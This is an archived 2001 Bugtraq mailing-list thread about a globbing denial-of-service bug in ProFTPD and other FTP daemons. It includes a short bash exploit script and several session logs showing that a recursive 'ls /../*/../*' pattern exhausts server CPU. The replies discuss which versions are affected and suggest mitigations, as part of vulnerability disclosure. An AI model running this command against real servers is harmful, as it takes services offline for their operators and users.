6941350 2001-08-20 15:20 +0200 /55 rader/ Enrico Kern <IphantomI@web.de> Sänt av: joel@lysator.liu.se Importerad: 2001-08-20 19:52 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18853> Ärende: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: "Enrico Kern" <IphantomI@web.de> To: bugtraq@securityfocus.com Message-ID: <200108201320.f7KDKZK26818@mailgate4.cinetic.de> Hi, i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = many new Linux-Dist.. When a user logged in in ftp and type the ls command the in.ftpd takes over 90 percent cpu-usage and execute = the command 2 or 3x than the full system hang up. it also works in = console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ = in march 01, but it still works so i post it again. affected: RedHat Linux 7.x Linux Mandrake 8.0 SuSE Linux 7.2 FreeBSD 4.3 AiX V 4.3 other? Not vuln.: latest Wu-Ftpd Windows FTP-Server Exploit: #!/bin/bash=20 ftp -n FTP-SERVER<<\end=20 quot user anonymous bin quot pass shitold@bug.com ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* bye=20 end=20 Fix: set cpu-limit for your anonymous user. ------------------------- Enrico Kern www.h07.org _______________________________________________________________________ 1.000.000 DM gewinnen - kostenlos tippen - http://millionenklick.web.de IhrName@web.de, 8MB Speicher, Verschluesselung - http://freemail.web.de (6941350) /Enrico Kern <IphantomI@web.de>/---------- Kommentar i text 6942692 av skip <skip@fif3.com> Kommentar i text 6943064 av Scott Dier <dieman@ringworld.org> Kommentar i text 6943159 av Mike Jakubik <mikej@trigger.net> Kommentar i text 6943274 av Bernhard Rosenkraenzer <bero@redhat.de> Kommentar i text 6943282 av Roman Drahtmueller <draht@suse.de> 6942692 2001-08-20 13:35 -0700 /18 rader/ skip <skip@fif3.com> Sänt av: joel@lysator.liu.se Importerad: 2001-08-20 23:22 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18859> Kommentar till text 6941350 av Enrico Kern <IphantomI@web.de> Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ I just tested on Slackware 8 running ProFTPD Version 1.2.1 and no bug... or at least I received the directory listings and no great CPU load was seen nor did my system hang. Tested via localhost and a remote host. ---- - skip ---- - p.s. we sincerely apologize to all platypus enthusiasts out - there who are offended by that thoughtless comment about - the platypi. we love the noble platypus, and it is not our - intention to slight these stupid creatures in any way. ---- (6942692) /skip <skip@fif3.com>/-------------------- Bilaga (application/x-pkcs7-signature) i text 6942693 Kommentar i text 6943150 av jeev <geonap@pacbell.net> 6942693 2001-08-20 13:35 -0700 /13 rader/ skip <skip@fif3.com> Bilagans filnamn: "smime.p7s" Importerad: 2001-08-20 23:22 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18860> Bilaga (text/plain) till text 6942692 Ärende: Bilaga (smime.p7s) till: Re: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ 0 *H÷ 010 + 0 *H÷ u00| V0 *H÷ 010 UZA10UWestern Cape10U Cape Town10 U Thawte10UCertificate Services1(0&UPersonal Freemail RSA 2000.8.300 010730171958Z 020730171958Z010UThawte Freemail Member10 *H÷ skip@fif3.com1'0% *H÷ sstellhorn@onesecure.com1!0 *H÷ skip@lovesheep.com00 *H÷ 0 ³;Õör{éz¹ÜçȦåeÂßï~Î¥¼bpÙé ÷zÌØ(g8ø˲wØowRîÛ·i6'»[jFÀwÿEs÷·&yûE»o8tçÆÓ´'d/_BûOiö¬<Ôûyù £|0z0Uÿù0 `HøB 0FU?0= skip@fif3.comsstellhorn@onesecure.comskip@lovesheep.com0Uÿ0 0 *H÷ §:7ÉóálÔùe¿ }-aØWK ¢«¹&©¥»ú.£ûÝÃc¼)O. ÂVËáäàhÞ{å©ÿß_ã6peÉîrÝfJt®ÝzñHfY¦³[ 4·äðTïléiBA]Æ~ËÀMgâ¤0)0 0 *H÷ 0Ñ10 UZA10UWestern Cape10U Cape Town10U Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0) *H÷ personal-freemail@thawte.com0 000830000000Z 020829235959Z010 UZA10UWestern Cape10U Cape Town10 U Thawte10UCertificate Services1(0&UPersonal Freemail RSA 2000.8.3000 *H÷ 0 Þ32¦cÇ %E>Ònx'gÅÚãD)c5*mp<úÜ®÷îto0¼3ù4q £mñÃO¢eÛ úKñÖÝa¥ù ÍU5u¨'®Ørùºö×°Þé«à¨|CBPQ<ð9´Tÿ³If - ìké¡i £N0L0)U"0 ¤010UPrivateLabel1-2970Uÿ0ÿ 0U0 *H÷ so&eÿ4KYbíD¾IÇè »¹ j&*b¸ctm·ÏSKáÍæ8ÙíPô:l4¬ænÁ# §ïK®rÝgõPo.X¸¶ÁPWµì×ï¶Õ·¢í9[9}4ü¶%MjôÅÃ/©¸<RüÝébH0-0 0 *H÷ 0Ñ10 UZA10UWestern Cape10U Cape Town10U Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0) *H÷ personal-freemail@thawte.com0 960101000000Z 201231235959Z0Ñ10 UZA10UWestern Cape10U Cape Town10U Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0) *H÷ personal-freemail@thawte.com00 *H÷ 0 Ôi×Ô°d[qéGØQ¶êr°^}- {ß %u(t:B,c'{Kï~ê£Ý¹ÎdÂnD¬|æèMq@8¦ £xöù^êÀ^vëÙ£]nz|¥KU)&Õj»8$jDZڣýyÛåZĹ £00Uÿ0ÿ0 *H÷ Çì~Nøõ¥gb*¤ðM`Ðo`Xa¬&»R5\Ï0û¨JbB#ôºd¬G)ß^Òl`q\¢¬Üyãçn Gµ (èäýô¦Ù|±øÜ_#& sÐÞC©%òæ/Êþ¦«uÝQkäøÑÎw¢1þ0ú0010 UZA10UWestern Cape10U Cape Town10 U Thawte10UCertificate Services1(0&UPersonal Freemail RSA 2000.8.30V0 + º0 *H÷ 1 *H÷ 0 *H÷ 1 010820203554Z0# *H÷ 1¬ýYû¥oâD W,â2×Æx0[ *H÷ 1N0L0 *H÷ 0*H÷ 0 *H÷ @0+0 *H÷ (0+0 *H÷ }ñ(»-y»aGyùÓ c¬j ³ä³*!Ò?CæR´Û Ï* +´');ÁÌÀ 9bN¼tñô2öwæ* tuLû# ò;RÏðèçcøph %/sÖÏ»ÝÙûÛµÀ;õë ðt·ÒÃÙè (6942693) /skip <skip@fif3.com>/----------(Ombruten) 6943150 2001-08-20 14:29 -0700 /39 rader/ jeev <geonap@pacbell.net> Sänt av: joel@lysator.liu.se Importerad: 2001-08-21 01:41 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18867> Kommentar till text 6942692 av skip <skip@fif3.com> Ärende: RE: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: jeev <geonap@pacbell.net> To: bugtraq@securityfocus.com Message-ID: <000501c129bf$32cf18d0$0100a8c0@jeev> Tested on slack 8 with 1.2.2rc3 no problem, and with 1.2.2 no problem: ftp> ls /../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 150 Opening ASCII mode data connection for file list. 226-Out of memory during globbing of /../*/../*/../*/../*/../*/../*/../* 226 Transfer complete. ftp> j -----Original Message----- From: skip [mailto:skip@fif3.com] Sent: Monday, August 20, 2001 1:36 PM To: bugtraq@securityfocus.com Subject: Re: Multiple-Vendor-FTP-Vuln. (old?) I just tested on Slackware 8 running ProFTPD Version 1.2.1 and no bug... or at least I received the directory listings and no great CPU load was seen nor did my system hang. Tested via localhost and a remote host. ---- - skip ---- - p.s. we sincerely apologize to all platypus enthusiasts out - there who are offended by that thoughtless comment about - the platypi. we love the noble platypus, and it is not our - intention to slight these stupid creatures in any way. ---- (6943150) /jeev <geonap@pacbell.net>/--------------- 6943064 2001-08-20 15:35 -0500 /21 rader/ Scott Dier <dieman@ringworld.org> Sänt av: joel@lysator.liu.se Importerad: 2001-08-21 01:10 av Brevbäraren Extern mottagare: Enrico Kern <IphantomI@web.de> Extern kopiemottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18866> Kommentar till text 6941350 av Enrico Kern <IphantomI@web.de> Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: Scott Dier <dieman@ringworld.org> To: Enrico Kern <IphantomI@web.de> Cc: bugtraq@securityfocus.com Message-ID: <20010820153506.M9092@ringworld.org> * Enrico Kern <IphantomI@web.de> [010820 12:31]: > Hi, > > i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = http://www.proftpd.org/critbugs.html Add "DenyFilter \*.*/" to your config. No software patch beats actual systems administration. -- Scott Dier <dieman@ringworld.org> <sdier@debian.org> http://www.ringworld.org/ #linuxos@irc.openprojects.net (6943064) /Scott Dier <dieman@ringworld.org>/------- 6943159 2001-08-20 15:14 -0400 /28 rader/ Mike Jakubik <mikej@trigger.net> Sänt av: joel@lysator.liu.se Importerad: 2001-08-21 01:47 av Brevbäraren Extern mottagare: Enrico Kern <IphantomI@web.de> Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18868> Kommentar till text 6941350 av Enrico Kern <IphantomI@web.de> Ärende: RE: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: "Mike Jakubik" <mikej@trigger.net> To: "Enrico Kern" <IphantomI@web.de>, <bugtraq@securityfocus.com> Message-ID: <FMELKCEINAGGPLLNMKEOGEACCNAA.mikej@trigger.net> > Hi, > > i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = > many new Linux-Dist.. When a user logged in in ftp and type > the ls command the in.ftpd takes over 90 percent cpu-usage and execute = > the command 2 or 3x than the full system hang up. it also works in = > console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ = > in march 01, but > it still works so i post it again. > > affected: > > RedHat Linux 7.x > Linux Mandrake 8.0 > SuSE Linux 7.2 > FreeBSD 4.3 > AiX V 4.3 > other? FreeBSD 4.3 is NOT affected by this, your system code may be out of sync. Yes, this is an old globing bug, almost all ftp daemons have been updated by now. Distributions before the bugs announced day will of course be affected. (6943159) /Mike Jakubik <mikej@trigger.net>/(Ombruten) 6943274 2001-08-20 19:36 +0200 /21 rader/ Bernhard Rosenkraenzer <bero@redhat.de> Sänt av: joel@lysator.liu.se Importerad: 2001-08-21 02:44 av Brevbäraren Extern mottagare: Enrico Kern <IphantomI@web.de> Extern kopiemottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18871> Kommentar till text 6941350 av Enrico Kern <IphantomI@web.de> Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: Bernhard Rosenkraenzer <bero@redhat.de> To: Enrico Kern <IphantomI@web.de> Cc: <bugtraq@securityfocus.com> Message-ID: <Pine.LNX.4.33.0108201935480.32746-100000@bochum.stuttgart.redhat.com> On Mon, 20 Aug 2001, Enrico Kern wrote: > i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = > many new Linux-Dist.. > > affected: > > RedHat Linux 7.x We don't ship proftpd (and never did). LLaP bero (6943274) /Bernhard Rosenkraenzer <bero@redhat.de>/- 6943282 2001-08-21 01:40 +0200 /55 rader/ Roman Drahtmueller <draht@suse.de> Sänt av: joel@lysator.liu.se Importerad: 2001-08-21 02:50 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Extern kopiemottagare: security@suse.de Mottagare: Bugtraq (import) <18872> Kommentar till text 6941350 av Enrico Kern <IphantomI@web.de> Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: Roman Drahtmueller <draht@suse.de> To: <bugtraq@securityfocus.com> Cc: <security@suse.de> Message-ID: <Pine.LNX.4.33.0108210132220.9532-100000@dent.suse.de> > > i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = > many new Linux-Dist.. When a user logged in in ftp and type > the ls command the in.ftpd takes over 90 percent cpu-usage and execute = > the command 2 or 3x than the full system hang up. it also works in = > console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ = > in march 01, but > it still works so i post it again. > > affected: > > RedHat Linux 7.x > Linux Mandrake 8.0 > SuSE Linux 7.2 I wonder when or where you tested this. The proftpd package that can be found in the /pub/suse/<arch>/update/*/n1/ directories on ftp.suse.com (age: May 9th) do not show this behaviour and appears to be sane. [...] > Fix: > > set cpu-limit for your anonymous user. I doubt that this solution is very efficient if you provide automatic gzip (and maybe tar) service so that your users can get a directory recursively in form of a tarfile by using the command get directory_name.tar.gz You'd have to choose... Also recommended: DenyFilter "%" if there are more format string errors in the code, this might be an easy workaround until the code is fixed in the right place. Roman. -- - - | Roman Drahtmüller <draht@suse.de> // "Caution: Cape does | SuSE GmbH - Security Phone: // not enable user to fly." | Nürnberg, Germany +49-911-740530 // (Batman Costume warning label) | - - (6943282) /Roman Drahtmueller <draht@suse.de>/(Ombruten) 6942124 2001-08-20 19:20 +0000 /19 rader/ Michael Faurot <mfaurot@atww.org> Sänt av: joel@lysator.liu.se Importerad: 2001-08-20 22:03 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18858> Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: "Michael Faurot" <mfaurot@atww.org> To: bugtraq@securityfocus.com Message-ID: <9lrnt0$k0p$1@phzzzt.atww.org> Enrico Kern <IphantomI@web.de> wrote: : Hi, : i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = : many new Linux-Dist.. This bug appears to still be present with Debian Stable (Potato) which uses ProFTPd v1.2.0pre10. -- ------------------------------------------------------------------------------ Michael | mfaurot | Give your child mental blocks for Christmas. Faurot | atww.org | (6942124) /Michael Faurot <mfaurot@atww.org>/------- Kommentar i text 6943051 av Robert van der Meulen <rvdm@debian.org> 6943051 2001-08-21 00:12 +0200 /25 rader/ Robert van der Meulen <rvdm@debian.org> Sänt av: joel@lysator.liu.se Importerad: 2001-08-21 01:06 av Brevbäraren Extern mottagare: Michael Faurot <mfaurot@atww.org> Extern kopiemottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18864> Kommentar till text 6942124 av Michael Faurot <mfaurot@atww.org> Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: Robert van der Meulen <rvdm@debian.org> To: Michael Faurot <mfaurot@atww.org> Cc: bugtraq@securityfocus.com Message-ID: <20010821001246.A9136@wiretrip.org> Hi, Quoting Michael Faurot (mfaurot@atww.org): > : i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on = > : many new Linux-Dist.. > This bug appears to still be present with Debian Stable (Potato) which > uses ProFTPd v1.2.0pre10. Are you sure ? what exact version are you testing with ? I tested this with a couple of Debian stable machines, all running with the latest security updates (i.e. proftpd 1.2.0pre10-2.0potato1), and couldn't reproduce it. Greets, Robert -- Linux Generation encrypted mail preferred. finger rvdm@debian.org for my GnuPG/PGP key. <doogie> 'How to Raise Your I.Q. by Eating Gifted Children' (6943051) /Robert van der Meulen <rvdm@debian.org>/- 6943262 2001-08-21 01:41 +0200 /55 rader/ E. van Elk <evelk@dsv.nl> Sänt av: joel@lysator.liu.se Importerad: 2001-08-21 02:38 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18870> Ärende: RE: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: "E. van Elk" <evelk@dsv.nl> To: bugtraq@securityfocus.com Message-ID: <5.1.0.14.2.20010821012930.02edfd50@pop.eve-software.com> At 00:43 21-8-2001, you wrote: >Couldn't reproduce on Debian 2.2.... > >isp-server-03:/# proftpd -v > - ProFTPD Version 1.2.0pre10 I tested it on my Debian 2.2 machine and: :/# proftpd -v - ProFTPD Version 1.2.0pre10 Verbonden met . 220 ProFTPD 1.2.0pre10 Server (Debian) [] Gebruiker ( :(none)): 331 Password required for . Wachtwoord: 230 User logged in. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 550 No files found. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. Verbinding verbroken door externe host. ftp> CPU goes to 99.1 % and after the second attempt the connection to the server is broken.. Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too: Verbonden met . 220 FTP server (Version 6.2/OpenBSD/Linux-0.10) ready. Gebruiker ( :(none)): 331 Password required for . Wachtwoord: 230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686 unknown 230- 230 User logged in. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 550 not found ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. Verbinding verbroken door externe host. ftp> CPU goes to 99.1 % and after the second attempt the connection to the server is broken.. (6943262) /E. van Elk <evelk@dsv.nl>/--------------- 6943327 2001-08-21 08:43 +1000 /50 rader/ Michael Bellears <michael.bellears@staff.datafx.com.au> Sänt av: joel@lysator.liu.se Importerad: 2001-08-21 03:19 av Brevbäraren Extern mottagare: 'Michael Faurot' <mfaurot@atww.org> Extern kopiemottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18875> Ärende: RE: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: Michael Bellears <michael.bellears@staff.datafx.com.au> To: 'Michael Faurot' <mfaurot@atww.org> Cc: bugtraq@securityfocus.com Message-ID: <C01D5C25A363D411A99200902760F2712C2A94@thematrix.datafx.com.au> Couldn't reproduce on Debian 2.2.... isp-server-03:/# proftpd -v - ProFTPD Version 1.2.0pre10 Remote system type is UNIX. Using binary mode to transfer files. ftp> bin 200 Type set to I. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 550 /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*: Forbidden command argument ftp> quit 221 Goodbye. Regards, MB > -----Original Message----- > From: Michael Faurot [mailto:mfaurot@atww.org] > Sent: Tuesday, 21 August 2001 5:20 AM > To: bugtraq@securityfocus.com > Subject: Re: Multiple-Vendor-FTP-Vuln. (old?) > > > Enrico Kern <IphantomI@web.de> wrote: > : Hi, > > : i tested an old proftpd bug (ls > /../*/../*/../*/../*/../*/../*/../*) on = > : many new Linux-Dist.. > > This bug appears to still be present with Debian Stable (Potato) which > uses ProFTPd v1.2.0pre10. > > -- > -------------------------------------------------------------- > ---------------- > Michael | mfaurot | Give your child mental blocks for Christmas. > Faurot | atww.org | > (6943327) /Michael Bellears <michael.bellears@staff.datafx.com.au>/ 6943621 2001-08-21 03:54 +0000 /76 rader/ Michael Faurot <mfaurot@atww.org> Sänt av: joel@lysator.liu.se Importerad: 2001-08-21 06:26 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <18879> Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?) ------------------------------------------------------------ From: "Michael Faurot" <mfaurot@atww.org> To: bugtraq@securityfocus.com Message-ID: <9lsm23$2g9$1@phzzzt.atww.org> Michael Bellears <michael.bellears@staff.datafx.com.au> wrote: : Couldn't reproduce on Debian 2.2.... : isp-server-03:/# proftpd -v : - ProFTPD Version 1.2.0pre10 Debian 2.2 and the same version of ProftpD here. According to dpkg: dpkg -s proftpd | grep ^Version Version: 1.2.0pre10-2.0potato1 The client side of the ftp session, that initiates the problem: ------------------------------------------------------------------------------ Script started on Mon Aug 20 18:15:49 2001 $ ftp ftp.mydomain.com Connected to web.mydomain.com. 220 ProFTPD 1.2.0pre10 Server (mydomain.com FTP) [web.mydomain.com] Name (ftp.mydomain.com:mfaurot): 331 Password required for mfaurot. Password: 230 User mfaurot logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 150 Opening ASCII mode data connection for file list. Quit $ exit Script done on Mon Aug 20 18:18:22 2001 ------------------------------------------------------------------------------ After issuing the "ls" command the server seems to freeze after displaying "150 Opening ASCII mode data connection for file list." It then becomes necessary to issue a Ctrl-\ to exit the ftp client. Now, on the server hosting Proftpd, here's the relevant bit from "top" showing the proftpd process sucking all the available CPU and a lot of the RAM: ------------------------------------------------------------------------------ 6:18pm up 5 days, 3:02, 2 users, load average: 0.28, 0.06, 0.02 45 processes: 42 sleeping, 3 running, 0 zombie, 0 stopped CPU states: 0.6% user, 0.1% system, 0.2% nice, 1.9% idle Mem: 255984K av, 184876K used, 71108K free, 0K shrd, 2464K buff Swap: 248968K av, 26260K used, 222708K free 19400K cached PID USER PRI NI SIZE RSS SHARE STAT LIB %CPU %MEM TIME COMMAND 27556 mfaurot 20 0 76884 75M 952 R 0 96.4 30.0 0:21 proftpd 27561 mfaurot 12 0 1476 1476 740 R 0 2.8 0.5 0:00 top 1 root 8 0 132 84 60 S 0 0.0 0.0 0:03 init 2 root 9 0 0 0 0 SW 0 0.0 0.0 0:00 keventd ------------------------------------------------------------------------------ NOTE: The configuration option "DenyFilter \*.*/" has not been applied to this system. While that might well resolve the issue for me, that's not going to fix the problem for the next person that is unaware of the bug. In discussing this situation with Robert van der Meulen, I note that this only happens when one logs in with a regular user id and password, but it doesn't happen when doing an anonymous login. -- ------------------------------------------------------------------------------ Michael | mfaurot | We're all just basically monkeys with car keys. Faurot | atww.org | (6943621) /Michael Faurot <mfaurot@atww.org>/-------